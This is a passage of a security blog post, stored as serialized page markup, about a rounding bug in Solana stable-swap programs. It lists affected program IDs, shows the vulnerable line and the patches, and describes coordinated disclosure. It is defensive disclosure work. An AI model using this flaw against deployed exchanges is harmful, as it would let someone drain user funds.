-um",{"type":27,"tag":207,"props":11550,"children":11551},{"style":226},[11552],{"type":33,"value":11553}," |",{"type":27,"tag":207,"props":11555,"children":11556},{"style":1335},[11557],{"type":33,"value":11558}," grep",{"type":27,"tag":207,"props":11560,"children":11561},{"style":1325},[11562],{"type":33,"value":11563}," 'Instruction: Swap'",{"type":27,"tag":207,"props":11565,"children":11566},{"style":1325},[11567],{"type":33,"value":11568}," -B1\n",{"type":27,"tag":36,"props":11570,"children":11571},{},[11572],{"type":33,"value":11573},"With some Google dorking, we were able to identify many of these programs.",{"type":27,"tag":101,"props":11575,"children":11577},{"code":11576},"1SoLTvbiicqXZ3MJmnTL2WYXKLYpuxwHpa4yYrVQaMZ - \"1 SOL\"\n9W959DqEETiGZocYWCQPaJ6sBmUzgfxXfqGeTEdp3aQP - Orca Swap Program v2\nSCHAtsf8mbjyjiv4LkhLKutTf6JnZAbdJKFkXQNMFHZ - \"Sencha Swap\"\nSSwapUtytfBdBn1b9NUGG6foMVPtcWgpRU32HToDUZr - \"Saros Swap\"\nSSwpkEEcbUqx4vtoEByFjSkhKdCT862DNVb52nZg1UZ - Saber Stable Swap Program\nSSwpMgqNDsyV7mAgN9ady4bDVu5ySjmmXejXvy2vLt1 - Step Finance Swap Program\nSwaPpA9LAaLfeLi3a68M4DjnLqgtticKg6CnyNwgAC8 - Swap Program\n",[11578],{"type":27,"tag":84,"props":11579,"children":11580},{"__ignoreMap":7},[11581],{"type":33,"value":11576},{"type":27,"tag":36,"props":11583,"children":11584},{},[11585],{"type":33,"value":11586},"Now it was time to contact these teams.",{"type":27,"tag":36,"props":11588,"children":11589},{},[11590],{"type":33,"value":11591},"Of these protocols, Saber was the only one which had BTC stable swaps, which would make exploitation immediately profitable. Luckily, they were also the most responsive, triaging and patching the vulnerability in just over one day.",{"type":27,"tag":36,"props":11593,"children":11594},{},[11595],{"type":33,"value":11596},"After some discussion, they decided to port a patch from Curve.fi, subtracting one from the output amount.",{"type":27,"tag":101,"props":11598,"children":11600},{"code":11599,"language":10269,"meta":7,"className":10270,"style":7},"- let dy = swap_destination_amount.checked_sub(y)?;\n+ // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n+ let dy = swap_destination_amount.checked_sub(y)?.checked_sub(1)?;\n",[11601],{"type":27,"tag":84,"props":11602,"children":11603},{"__ignoreMap":7},[11604,11658,11670],{"type":27,"tag":207,"props":11605,"children":11606},{"class":209,"line":210},[11607,11612,11616,11621,11625,11630,11634,11638,11642,11646,11650,11654],{"type":27,"tag":207,"props":11608,"children":11609},{"style":226},[11610],{"type":33,"value":11611},"-",{"type":27,"tag":207,"props":11613,"children":11614},{"style":214},[11615],{"type":33,"value":10353},{"type":27,"tag":207,"props":11617,"children":11618},{"style":220},[11619],{"type":33,"value":11620}," dy",{"type":27,"tag":207,"props":11622,"children":11623},{"style":226},[11624],{"type":33,"value":229},{"type":27,"tag":207,"props":11626,"children":11627},{"style":220},[11628],{"type":33,"value":11629}," swap_destination_amount",{"type":27,"tag":207,"props":11631,"children":11632},{"style":226},[11633],{"type":33,"value":1041},{"type":27,"tag":207,"props":11635,"children":11636},{"style":1335},[11637],{"type":33,"value":10525},{"type":27,"tag":207,"props":11639,"children":11640},{"style":238},[11641],{"type":33,"value":1343},{"type":27,"tag":207,"props":11643,"children":11644},{"style":220},[11645],{"type":33,"value":10403},{"type":27,"tag":207,"props":11647,"children":11648},{"style":238},[11649],{"type":33,"value":10416},{"type":27,"tag":207,"props":11651,"children":11652},{"style":226},[11653],{"type":33,"value":10444},{"type":27,"tag":207,"props":11655,"children":11656},{"style":238},[11657],{"type":33,"value":241},{"type":27,"tag":207,"props":11659,"children":11660},{"class":209,"line":244},[11661,11665],{"type":27,"tag":207,"props":11662,"children":11663},{"style":226},[11664],{"type":33,"value":2227},{"type":27,"tag":207,"props":11666,"children":11667},{"style":4647},[11668],{"type":33,"value":11669}," // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n",{"type":27,"tag":207,"props":11671,"children":11672},{"class":209,"line":270},[11673,11677,11681,11685,11689,11693,11697,11701,11705,11709,11713,11717,11721,11725,11729,11733,11737],{"type":27,"tag":207,"props":11674,"children":11675},{"style":226},[11676],{"type":33,"value":2227},{"type":27,"tag":207,"props":11678,"children":11679},{"style":214},[11680],{"type":33,"value":10353},{"type":27,"tag":207,"props":11682,"children":11683},{"style":220},[11684],{"type":33,"value":11620},{"type":27,"tag":207,"props":11686,"children":11687},{"style":226},[11688],{"type":33,"value":229},{"type":27,"tag":207,"props":11690,"children":11691},{"style":220},[11692],{"type":33,"value":11629},{"type":27,"tag":207,"props":11694,"children":11695},{"style":226},[11696],{"type":33,"value":1041},{"type":27,"tag":207,"props":11698,"children":11699},{"style":1335},[11700],{"type":33,"value":10525},{"type":27,"tag":207,"props":11702,"children":11703},{"style":238},[11704],{"type":33,"value":1343},{"type":27,"tag":207,"props":11706,"children":11707},{"style":220},[11708],{"type":33,"value":10403},{"type":27,"tag":207,"props":11710,"children":11711},{"style":238},[11712],{"type":33,"value":10416},{"type":27,"tag":207,"props":11714,"children":11715},{"style":226},[11716],{"type":33,"value":10421},{"type":27,"tag":207,"props":11718,"children":11719},{"style":1335},[11720],{"type":33,"value":10525},{"type":27,"tag":207,"props":11722,"children":11723},{"style":238},[11724],{"type":33,"value":1343},{"type":27,"tag":207,"props":11726,"children":11727},{"style":232},[11728],{"type":33,"value":1651},{"type":27,"tag":207,"props":11730,"children":11731},{"style":238},[11732],{"type":33,"value":10416},{"type":27,"tag":207,"props":11734,"children":11735},{"style":226},[11736],{"type":33,"value":10444},{"type":27,"tag":207,"props":11738,"children":11739},{"style":238},[11740],{"type":33,"value":241},{"type":27,"tag":36,"props":11742,"children":11743},{},[11744,11746,11753],{"type":33,"value":11745},"For reference, here is the ",{"type":27,"tag":47,"props":11747,"children":11750},{"href":11748,"rel":11749},"https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466",[51],[11751],{"type":33,"value":11752},"Curve.fi implementation",{"type":33,"value":1041},{"type":27,"tag":101,"props":11755,"children":11759},{"code":11756,"language":11757,"meta":7,"className":11758,"style":7}," dy: uint256 = xp[j] - y - 1 # -1 just in case there were some rounding errors\n dy_fee: uint256 = dy * self.fee / FEE_DENOMINATOR\n","solidity","language-solidity shiki shiki-themes slack-dark",[11760],{"type":27,"tag":84,"props":11761,"children":11762},{"__ignoreMap":7},[11763,11824],{"type":27,"tag":207,"props":11764,"children":11765},{"class":209,"line":210},[11766,11771,11775,11780,11784,11789,11793,11798,11802,11806,11811,11815,11819],{"type":27,"tag":207,"props":11767,"children":11768},{"style":238},[11769],{"type":33,"value":11770}," dy",{"type":27,"tag":207,"props":11772,"children":11773},{"style":226},[11774],{"type":33,"value":736},{"type":27,"tag":207,"props":11776,"children":11777},{"style":8920},[11778],{"type":33,"value":11779}," uint256",{"type":27,"tag":207,"props":11781,"children":11782},{"style":226},[11783],{"type":33,"value":229},{"type":27,"tag":207,"props":11785,"children":11786},{"style":238},[11787],{"type":33,"value":11788}," xp[j] ",{"type":27,"tag":207,"props":11790,"children":11791},{"style":226},[11792],{"type":33,"value":11611},{"type":27,"tag":207,"props":11794,"children":11795},{"style":238},[11796],{"type":33,"value":11797}," y ",{"type":27,"tag":207,"props":11799,"children":11800},{"style":226},[11801],{"type":33,"value":11611},{"type":27,"tag":207,"props":11803,"children":11804},{"style":232},[11805],{"type":33,"value":235},{"type":27,"tag":207,"props":11807,"children":11808},{"style":238},[11809],{"type":33,"value":11810}," # ",{"type":27,"tag":207,"props":11812,"children":11813},{"style":226},[11814],{"type":33,"value":11611},{"type":27,"tag":207,"props":11816,"children":11817},{"style":232},[11818],{"type":33,"value":1651},{"type":27,"tag":207,"props":11820,"children":11821},{"style":238},[11822],{"type":33,"value":11823}," just in case there were some rounding errors\n",{"type":27,"tag":207,"props":11825,"children":11826},{"class":209,"line":244},[11827,11832,11836,11840,11844,11849,11853,11858,11862],{"type":27,"tag":207,"props":11828,"children":11829},{"style":238},[11830],{"type":33,"value":11831}," dy_fee",{"type":27,"tag":207,"props":11833,"children":11834},{"style":226},[11835],{"type":33,"value":736},{"type":27,"tag":207,"props":11837,"children":11838},{"style":8920},[11839],{"type":33,"value":11779},{"type":27,"tag":207,"props":11841,"children":11842},{"style":226},[11843],{"type":33,"value":229},{"type":27,"tag":207,"props":11845,"children":11846},{"style":238},[11847],{"type":33,"value":11848}," dy ",{"type":27,"tag":207,"props":11850,"children":11851},{"style":226},[11852],{"type":33,"value":9286},{"type":27,"tag":207,"props":11854,"children":11855},{"style":238},[11856],{"type":33,"value":11857}," self.fee ",{"type":27,"tag":207,"props":11859,"children":11860},{"style":226},[11861],{"type":33,"value":980},{"type":27,"tag":207,"props":11863,"children":11864},{"style":238},[11865],{"type":33,"value":11866}," FEE_DENOMINATOR\n",{"type":27,"tag":36,"props":11868,"children":11869},{},[11870,11872,11879],{"type":33,"value":11871},"We originally thought this was an additional patch that didn't get ported over to Solana. However, it turns out this code was actually included in the ",{"type":27,"tag":47,"props":11873,"children":11876},{"href":11874,"rel":11875},"https://github.com/curvefi/curve-contract/commit/0fd801df7488d89f0e2fc81e760942d7858b01d6",[51],[11877],{"type":33,"value":11878},"original commit",{"type":33,"value":11880},", not as an additional security patch.",{"type":27,"tag":101,"props":11882,"children":11884},{"code":11883},"commit 0fd801df7488d89f0e2fc81e760942d7858b01d6\nAuthor: Ben Hauser \u003Cben@hauser.id>\nDate: Mon Aug 31 02:35:30 2020 +0300\n\n feat: add base pool without lending\n",[11885],{"type":27,"tag":84,"props":11886,"children":11887},{"__ignoreMap":7},[11888],{"type":33,"value":11883},{"type":27,"tag":36,"props":11890,"children":11891},{},[11892,11894,11901],{"type":33,"value":11893},"The commit adding stable swaps to SPL was ",{"type":27,"tag":47,"props":11895,"children":11898},{"href":11896,"rel":11897},"https://github.com/solana-labs/solana-program-library/commit/d62ddd2b94d5d2daaa97460b165d288610a87623",[51],[11899],{"type":33,"value":11900},"made a few months later",{"type":33,"value":11902},", meaning there was some disconnect when porting the code. Either the rounding was thought to be unnecesary, or it was simply forgotten.",{"type":27,"tag":101,"props":11904,"children":11906},{"code":11905},"commit d62ddd2b94d5d2daaa97460b165d288610a87623\nAuthor: Yuriy Savchenko \u003Cyuriy.savchenko@gmail.com>\nDate: Tue Nov 17 15:13:18 2020 +0200\n\n Added stable curve invariant to the token swap smart contract (#838)\n\n * Added stable curve invariant to the token swap smart contract\n\n * Fixed formatting\n\n * Added missing stable curve constraints\n\n * Symbol renames to make math clearer\n\n * Small refactoring according to PR comments, fixes for JS tests\n",[11907],{"type":27,"tag":84,"props":11908,"children":11909},{"__ignoreMap":7},[11910],{"type":33,"value":11905},{"type":27,"tag":36,"props":11912,"children":11913},{},[11914,11916,11923],{"type":33,"value":11915},"After contacting some other swap projects which were unaffected, we decided to notify the Solana team in order to get a patch upstreamed to ",{"type":27,"tag":47,"props":11917,"children":11920},{"href":11918,"rel":11919},"https://github.com/solana-labs/solana-program-library",[51],[11921],{"type":33,"value":11922},"the Solana Program Library",{"type":33,"value":1041},{"type":27,"tag":36,"props":11925,"children":11926},{},[11927],{"type":33,"value":11928},"While few projects deploy the swap program from the Solana Program Library, the SPL program is meant as a reference implementation, and many exchanges fork their own code off of it.",{"type":27,"tag":36,"props":11930,"children":11931},{},[11932,11939],{"type":27,"tag":47,"props":11933,"children":11936},{"href":11934,"rel":11935},"https://github.com/joncinque",[51],[11937],{"type":33,"value":11938},"@joncinque",{"type":33,"value":11940}," helped triage this patch. We also asked him for his thoughts on a more complete solution.",{"type":27,"tag":10222,"props":11942,"children":11943},{},[11944],{"type":27,"tag":36,"props":11945,"children":11946},{},[11947],{"type":33,"value":11948},"Honestly, the idea of just subtracting 1 from the output will cover almost all situations correctly, so it's a good quick solution. I'll take a look to see if we can solve this for all situations through a correct application of checked_ceil_div, as with the constant product curve.",{"type":27,"tag":36,"props":11950,"children":11951},{},[11952,11954,11961,11963,11969],{"type":33,"value":11953},"After some thought, he helped ",{"type":27,"tag":47,"props":11955,"children":11958},{"href":11956,"rel":11957},"https://github.com/solana-labs/solana-program-library/pull/2942",[51],[11959],{"type":33,"value":11960},"introduce a PR",{"type":33,"value":11962}," which ceilings the computation in ",{"type":27,"tag":84,"props":11964,"children":11966},{"className":11965},[],[11967],{"type":33,"value":11968},"compute_new_destination_amount",{"type":33,"value":11970}," to correctly round within the stable curve math library.",{"type":27,"tag":101,"props":11972,"children":11974},{"code":11973,"language":10269,"meta":7,"className":10270,"style":7}," // Solve for y by approximating: y**2 + b*y = c\n let mut y_prev: U256;\n let mut y = d_val;\n for _ in 0..ITERATIONS {\n- y_prev = y;\n- y = (checked_u8_power(&y, 2)?.checked_add(c)?)\n- .checked_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n- if y == y_prev {\n+ let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n+ .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n+ if y_new == y {\n break;\n+ } else {\n+ y = y_new;\n }\n",[11975],{"type":27,"tag":84,"props":11976,"children":11977},{"__ignoreMap":7},[11978,11986,12016,12043,12071,12095,12171,12275,12302,12397,12500,12527,12539,12558,12581],{"type":27,"tag":207,"props":11979,"children":11980},{"class":209,"line":210},[11981],{"type":27,"tag":207,"props":11982,"children":11983},{"style":4647},[11984],{"type":33,"value":11985}," // Solve for y by approximating: y**2 + b*y = c\n",{"type":27,"tag":207,"props":11987,"children":11988},{"class":209,"line":244},[11989,11994,11998,12003,12007,12012],{"type":27,"tag":207,"props":11990,"children":11991},{"style":214},[11992],{"type":33,"value":11993}," let",{"type":27,"tag":207,"props":11995,"children":11996},{"style":214},[11997],{"type":33,"value":10295},{"type":27,"tag":207,"props":11999,"children":12000},{"style":220},[12001],{"type":33,"value":12002}," y_prev",{"type":27,"tag":207,"props":12004,"children":12005},{"style":226},[12006],{"type":33,"value":736},{"type":27,"tag":207,"props":12008,"children":12009},{"style":8920},[12010],{"type":33,"value":12011}," U256",{"type":27,"tag":207,"props":12013,"children":12014},{"style":238},[12015],{"type":33,"value":241},{"type":27,"tag":207,"props":12017,"children":12018},{"class":209,"line":270},[12019,12023,12027,12031,12035,12039],{"type":27,"tag":207,"props":12020,"children":12021},{"style":214},[12022],{"type":33,"value":11993},{"type":27,"tag":207,"props":12024,"children":12025},{"style":214},[12026],{"type":33,"value":10295},{"type":27,"tag":207,"props":12028,"children":12029},{"style":220},[12030],{"type":33,"value":10300},{"type":27,"tag":207,"props":12032,"children":12033},{"style":226},[12034],{"type":33,"value":229},{"type":27,"tag":207,"props":12036,"children":12037},{"style":220},[12038],{"type":33,"value":10309},{"type":27,"tag":207,"props":12040,"children":12041},{"style":238},[12042],{"type":33,"value":241},{"type":27,"tag":207,"props":12044,"children":12045},{"class":209,"line":296},[12046,12051,12055,12059,12063,12067],{"type":27,"tag":207,"props":12047,"children":12048},{"style":376},[12049],{"type":33,"value":12050}," for",{"type":27,"tag":207,"props":12052,"children":12053},{"style":220},[12054],{"type":33,"value":10326},{"type":27,"tag":207,"props":12056,"children":12057},{"style":214},[12058],{"type":33,"value":10331},{"type":27,"tag":207,"props":12060,"children":12061},{"style":232},[12062],{"type":33,"value":4680},{"type":27,"tag":207,"props":12064,"children":12065},{"style":226},[12066],{"type":33,"value":10340},{"type":27,"tag":207,"props":12068,"children":12069},{"style":238},[12070],{"type":33,"value":10345},{"type":27,"tag":207,"props":12072,"children":12073},{"class":209,"line":445},[12074,12078,12083,12087,12091],{"type":27,"tag":207,"props":12075,"children":12076},{"style":226},[12077],{"type":33,"value":11611},{"type":27,"tag":207,"props":12079,"children":12080},{"style":220},[12081],{"type":33,"value":12082}," y_prev",{"type":27,"tag":207,"props":12084,"children":12085},{"style":226},[12086],{"type":33,"value":229},{"type":27,"tag":207,"props":12088,"children":12089},{"style":220},[12090],{"type":33,"value":10300},{"type":27,"tag":207,"props":12092,"children":12093},{"style":238},[12094],{"type":33,"value":241},{"type":27,"tag":207,"props":12096,"children":12097},{"class":209,"line":867},[12098,12102,12107,12111,12115,12119,12123,12127,12131,12135,12139,12143,12147,12151,12155,12159,12163,12167],{"type":27,"tag":207,"props":12099,"children":12100},{"style":226},[12101],{"type":33,"value":11611},{"type":27,"tag":207,"props":12103,"children":12104},{"style":220},[12105],{"type":33,"value":12106}," y",{"type":27,"tag":207,"props":12108,"children":12109},{"style":226},[12110],{"type":33,"value":229},{"type":27,"tag":207,"props":12112,"children":12113},{"style":238},[12114],{"type":33,"value":686},{"type":27,"tag":207,"props":12116,"children":12117},{"style":1335},[12118],{"type":33,"value":10389},{"type":27,"tag":207,"props":12120,"children":12121},{"style":238},[12122],{"type":33,"value":1343},{"type":27,"tag":207,"props":12124,"children":12125},{"style":226},[12126],{"type":33,"value":10398},{"type":27,"tag":207,"props":12128,"children":12129},{"style":220},[12130],{"type":33,"value":10403},{"type":27,"tag":207,"props":12132,"children":12133},{"style":238},[12134],{"type":33,"value":1123},{"type":27,"tag":207,"props":12136,"children":12137},{"style":232},[12138],{"type":33,"value":1744},{"type":27,"tag":207,"props":12140,"children":12141},{"style":238},[12142],{"type":33,"value":10416},{"type":27,"tag":207,"props":12144,"children":12145},{"style":226},[12146],{"type":33,"value":10421},{"type":27,"tag":207,"props":12148,"children":12149},{"style":1335},[12150],{"type":33,"value":10426},{"type":27,"tag":207,"props":12152,"children":12153},{"style":238},[12154],{"type":33,"value":1343},{"type":27,"tag":207,"props":12156,"children":12157},{"style":220},[12158],{"type":33,"value":10435},{"type":27,"tag":207,"props":12160,"children":12161},{"style":238},[12162],{"type":33,"value":10416},{"type":27,"tag":207,"props":12164,"children":12165},{"style":226},[12166],{"type":33,"value":10444},{"type":27,"tag":207,"props":12168,"children":12169},{"style":238},[12170],{"type":33,"value":10449},{"type":27,"tag":207,"props":12172,"children":12173},{"class":209,"line":892},[12174,12178,12182,12187,12191,12195,12199,12203,12207,12211,12215,12219,12223,12227,12231,12235,12239,12243,12247,12251,12255,12259,12263,12267,12271],{"type":27,"tag":207,"props":12175,"children":12176},{"style":226},[12177],{"type":33,"value":11611},{"type":27,"tag":207,"props":12179,"children":12180},{"style":226},[12181],{"type":33,"value":10457},{"type":27,"tag":207,"props":12183,"children":12184},{"style":1335},[12185],{"type":33,"value":12186},"checked_div",{"type":27,"tag":207,"props":12188,"children":12189},{"style":238},[12190],{"type":33,"value":1343},{"type":27,"tag":207,"props":12192,"children":12193},{"style":1335},[12194],{"type":33,"value":10471},{"type":27,"tag":207,"props":12196,"children":12197},{"style":238},[12198],{"type":33,"value":1343},{"type":27,"tag":207,"props":12200,"children":12201},{"style":226},[12202],{"type":33,"value":10398},{"type":27,"tag":207,"props":12204,"children":12205},{"style":220},[12206],{"type":33,"value":10403},{"type":27,"tag":207,"props":12208,"children":12209},{"style":238},[12210],{"type":33,"value":1123},{"type":27,"tag":207,"props":12212,"children":12213},{"style":232},[12214],{"type":33,"value":1744},{"type":27,"tag":207,"props":12216,"children":12217},{"style":238},[12218],{"type":33,"value":10416},{"type":27,"tag":207,"props":12220,"children":12221},{"style":226},[12222],{"type":33,"value":10421},{"type":27,"tag":207,"props":12224,"children":12225},{"style":1335},[12226],{"type":33,"value":10426},{"type":27,"tag":207,"props":12228,"children":12229},{"style":238},[12230],{"type":33,"value":1343},{"type":27,"tag":207,"props":12232,"children":12233},{"style":220},[12234],{"type":33,"value":10512},{"type":27,"tag":207,"props":12236,"children":12237},{"style":238},[12238],{"type":33,"value":10416},{"type":27,"tag":207,"props":12240,"children":12241},{"style":226},[12242],{"type":33,"value":10421},{"type":27,"tag":207,"props":12244,"children":12245},{"style":1335},[12246],{"type":33,"value":10525},{"type":27,"tag":207,"props":12248,"children":12249},{"style":238},[12250],{"type":33,"value":1343},{"type":27,"tag":207,"props":12252,"children":12253},{"style":220},[12254],{"type":33,"value":10534},{"type":27,"tag":207,"props":12256,"children":12257},{"style":238},[12258],{"type":33,"value":10416},{"type":27,"tag":207,"props":12260,"children":12261},{"style":226},[12262],{"type":33,"value":10444},{"type":27,"tag":207,"props":12264,"children":12265},{"style":238},[12266],{"type":33,"value":10416},{"type":27,"tag":207,"props":12268,"children":12269},{"style":226},[12270],{"type":33,"value":10444},{"type":27,"tag":207,"props":12272,"children":12273},{"style":238},[12274],{"type":33,"value":241},{"type":27,"tag":207,"props":12276,"children":12277},{"class":209,"line":1475},[12278,12282,12286,12290,12294,12298],{"type":27,"tag":207,"props":12279,"children":12280},{"style":226},[12281],{"type":33,"value":11611},{"type":27,"tag":207,"props":12283,"children":12284},{"style":376},[12285],{"type":33,"value":10562},{"type":27,"tag":207,"props":12287,"children":12288},{"style":220},[12289],{"type":33,"value":10300},{"type":27,"tag":207,"props":12291,"children":12292},{"style":226},[12293],{"type":33,"value":10572},{"type":27,"tag":207,"props":12295,"children":12296},{"style":220},[12297],{"type":33,"value":12002},{"type":27,"tag":207,"props":12299,"children":12300},{"style":238},[12301],{"type":33,"value":384},{"type":27,"tag":207,"props":12303,"children":12304},{"class":209,"line":2065},[12305,12309,12313,12317,12321,12325,12329,12333,12337,12341,12345,12349,12353,12357,12361,12365,12369,12373,12377,12381,12385,12389,12393],{"type":27,"tag":207,"props":12306,"children":12307},{"style":226},[12308],{"type":33,"value":2227},{"type":27,"tag":207,"props":12310,"children":12311},{"style":214},[12312],{"type":33,"value":10353},{"type":27,"tag":207,"props":12314,"children":12315},{"style":238},[12316],{"type":33,"value":686},{"type":27,"tag":207,"props":12318,"children":12319},{"style":220},[12320],{"type":33,"value":10362},{"type":27,"tag":207,"props":12322,"children":12323},{"style":238},[12324],{"type":33,"value":1123},{"type":27,"tag":207,"props":12326,"children":12327},{"style":220},[12328],{"type":33,"value":10371},{"type":27,"tag":207,"props":12330,"children":12331},{"style":238},[12332],{"type":33,"value":2222},{"type":27,"tag":207,"props":12334,"children":12335},{"style":226},[12336],{"type":33,"value":10380},{"type":27,"tag":207,"props":12338,"children":12339},{"style":238},[12340],{"type":33,"value":686},{"type":27,"tag":207,"props":12342,"children":12343},{"style":1335},[12344],{"type":33,"value":10389},{"type":27,"tag":207,"props":12346,"children":12347},{"style":238},[12348],{"type":33,"value":1343},{"type":27,"tag":207,"props":12350,"children":12351},{"style":226},[12352],{"type":33,"value":10398},{"type":27,"tag":207,"props":12354,"children":12355},{"style":220},[12356],{"type":33,"value":10403},{"type":27,"tag":207,"props":12358,"children":12359},{"style":238},[12360],{"type":33,"value":1123},{"type":27,"tag":207,"props":12362,"children":12363},{"style":232},[12364],{"type":33,"value":1744},{"type":27,"tag":207,"props":12366,"children":12367},{"style":238},[12368],{"type":33,"value":10416},{"type":27,"tag":207,"props":12370,"children":12371},{"style":226},[12372],{"type":33,"value":10421},{"type":27,"tag":207,"props":12374,"children":12375},{"style":1335},[12376],{"type":33,"value":10426},{"type":27,"tag":207,"props":12378,"children":12379},{"style":238},[12380],{"type":33,"value":1343},{"type":27,"tag":207,"props":12382,"children":12383},{"style":220},[12384],{"type":33,"value":10435},{"type":27,"tag":207,"props":12386,"children":12387},{"style":238},[12388],{"type":33,"value":10416},{"type":27,"tag":207,"props":12390,"children":12391},{"style":226},[12392],{"type":33,"value":10444},{"type":27,"tag":207,"props":12394,"children":12395},{"style":238},[12396],{"type":33,"value":10449},{"type":27,"tag":207,"props":12398,"children":12399},{"class":209,"line":2092},[12400,12404,12408,12412,12416,12420,12424,12428,12432,12436,12440,12444,12448,12452,12456,12460,12464,12468,12472,12476,12480,12484,12488,12492,12496],{"type":27,"tag":207,"props":12401,"children":12402},{"style":226},[12403],{"type":33,"value":2227},{"type":27,"tag":207,"props":12405,"children":12406},{"style":226},[12407],{"type":33,"value":10457},{"type":27,"tag":207,"props":12409,"children":12410},{"style":1335},[12411],{"type":33,"value":10462},{"type":27,"tag":207,"props":12413,"children":12414},{"style":238},[12415],{"type":33,"value":1343},{"type":27,"tag":207,"props":12417,"children":12418},{"style":1335},[12419],{"type":33,"value":10471},{"type":27,"tag":207,"props":12421,"children":12422},{"style":238},[12423],{"type":33,"value":1343},{"type":27,"tag":207,"props":12425,"children":12426},{"style":226},[12427],{"type":33,"value":10398},{"type":27,"tag":207,"props":12429,"children":12430},{"style":220},[12431],{"type":33,"value":10403},{"type":27,"tag":207,"props":12433,"children":12434},{"style":238},[12435],{"type":33,"value":1123},{"type":27,"tag":207,"props":12437,"children":12438},{"style":232},[12439],{"type":33,"value":1744},{"type":27,"tag":207,"props":12441,"children":12442},{"style":238},[12443],{"type":33,"value":10416},{"type":27,"tag":207,"props":12445,"children":12446},{"style":226},[12447],{"type":33,"value":10421},{"type":27,"tag":207,"props":12449,"children":12450},{"style":1335},[12451],{"type":33,"value":10426},{"type":27,"tag":207,"props":12453,"children":12454},{"style":238},[12455],{"type":33,"value":1343},{"type":27,"tag":207,"props":12457,"children":12458},{"style":220},[12459],{"type":33,"value":10512},{"type":27,"tag":207,"props":12461,"children":12462},{"style":238},[12463],{"type":33,"value":10416},{"type":27,"tag":207,"props":12465,"children":12466},{"style":226},[12467],{"type":33,"value":10421},{"type":27,"tag":207,"props":12469,"children":12470},{"style":1335},[12471],{"type":33,"value":10525},{"type":27,"tag":207,"props":12473,"children":12474},{"style":238},[12475],{"type":33,"value":1343},{"type":27,"tag":207,"props":12477,"children":12478},{"style":220},[12479],{"type":33,"value":10534},{"type":27,"tag":207,"props":12481,"children":12482},{"style":238},[12483],{"type":33,"value":10416},{"type":27,"tag":207,"props":12485,"children":12486},{"style":226},[12487],{"type":33,"value":10444},{"type":27,"tag":207,"props":12489,"children":12490},{"style":238},[12491],{"type":33,"value":10416},{"type":27,"tag":207,"props":12493,"children":12494},{"style":226},[12495],{"type":33,"value":10444},{"type":27,"tag":207,"props":12497,"children":12498},{"style":238},[12499],{"type":33,"value":241},{"type":27,"tag":207,"props":12501,"children":12502},{"class":209,"line":2130},[12503,12507,12511,12515,12519,12523],{"type":27,"tag":207,"props":12504,"children":12505},{"style":226},[12506],{"type":33,"value":2227},{"type":27,"tag":207,"props":12508,"children":12509},{"style":376},[12510],{"type":33,"value":10562},{"type":27,"tag":207,"props":12512,"children":12513},{"style":220},[12514],{"type":33,"value":10567},{"type":27,"tag":207,"props":12516,"children":12517},{"style":226},[12518],{"type":33,"value":10572},{"type":27,"tag":207,"props":12520,"children":12521},{"style":220},[12522],{"type":33,"value":10300},{"type":27,"tag":207,"props":12524,"children":12525},{"style":238},[12526],{"type":33,"value":384},{"type":27,"tag":207,"props":12528,"children":12529},{"class":209,"line":2168},[12530,12535],{"type":27,"tag":207,"props":12531,"children":12532},{"style":376},[12533],{"type":33,"value":12534}," break",{"type":27,"tag":207,"props":12536,"children":12537},{"style":238},[12538],{"type":33,"value":241},{"type":27,"tag":207,"props":12540,"children":12541},{"class":209,"line":4095},[12542,12546,12550,12554],{"type":27,"tag":207,"props":12543,"children":12544},{"style":226},[12545],{"type":33,"value":2227},{"type":27,"tag":207,"props":12547,"children":12548},{"style":238},[12549],{"type":33,"value":10600},{"type":27,"tag":207,"props":12551,"children":12552},{"style":376},[12553],{"type":33,"value":10605},{"type":27,"tag":207,"props":12555,"children":12556},{"style":238},[12557],{"type":33,"value":384},{"type":27,"tag":207,"props":12559,"children":12560},{"class":209,"line":4103},[12561,12565,12569,12573,12577],{"type":27,"tag":207,"props":12562,"children":12563},{"style":226},[12564],{"type":33,"value":2227},{"type":27,"tag":207,"props":12566,"children":12567},{"style":220},[12568],{"type":33,"value":10617},{"type":27,"tag":207,"props":12570,"children":12571},{"style":226},[12572],{"type":33,"value":229},{"type":27,"tag":207,"props":12574,"children":12575},{"style":220},[12576],{"type":33,"value":10567},{"type":27,"tag":207,"props":12578,"children":12579},{"style":238},[12580],{"type":33,"value":241},{"type":27,"tag":207,"props":12582,"children":12583},{"class":209,"line":4154},[12584],{"type":27,"tag":207,"props":12585,"children":12586},{"style":238},[12587],{"type":33,"value":12588}," }\n",{"type":27,"tag":28,"props":12590,"children":12592},{"id":12591},"closing-thoughts",[12593],{"type":33,"value":12594},"Closing Thoughts",{"type":27,"tag":36,"props":12596,"children":12597},{},[12598],{"type":33,"value":12599},"This is a good example of how messing around and interacting with the ecosystem can lead to unexpected bugs. We found this, not as a result of active security research, but as part of our work in MEV and trading.",{"type":27,"tag":36,"props":12601,"children":12602},{},[12603,12605,12611],{"type":33,"value":12604},"Another interesting takeaway is that ",{"type":27,"tag":12606,"props":12607,"children":12608},"strong",{},[12609],{"type":33,"value":12610},"fuzzing can give a false sense of security",{"type":33,"value":12612},". Prior to our report, Saber had already deployed comprehensive fuzzers for their swap implementation. A researcher looking at code coverage alone might come to the incorrect conclusion that such extensively fuzzed code couldn't possibly have a vulnerability.",{"type":27,"tag":36,"props":12614,"children":12615},{},[12616,12618,12625],{"type":33,"value":12617},"One can see parallels to traditional security, as with Google Project Zero's ",{"type":27,"tag":47,"props":12619,"children":12622},{"href":12620,"rel":12621},"https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html",[51],[12623],{"type":33,"value":12624},"port-mortem of the NSS overflow",{"type":33,"value":1041},{"type":27,"tag":36,"props":12627,"children":12628},{},[12629],{"type":27,"tag":126,"props":12630,"children":12632},{"alt":7,"src":12631},"/posts/spl-swap/p0.png",[],{"type":27,"tag":36,"props":12634,"children":12635},{},[12636],{"type":33,"value":12637},"A heavily 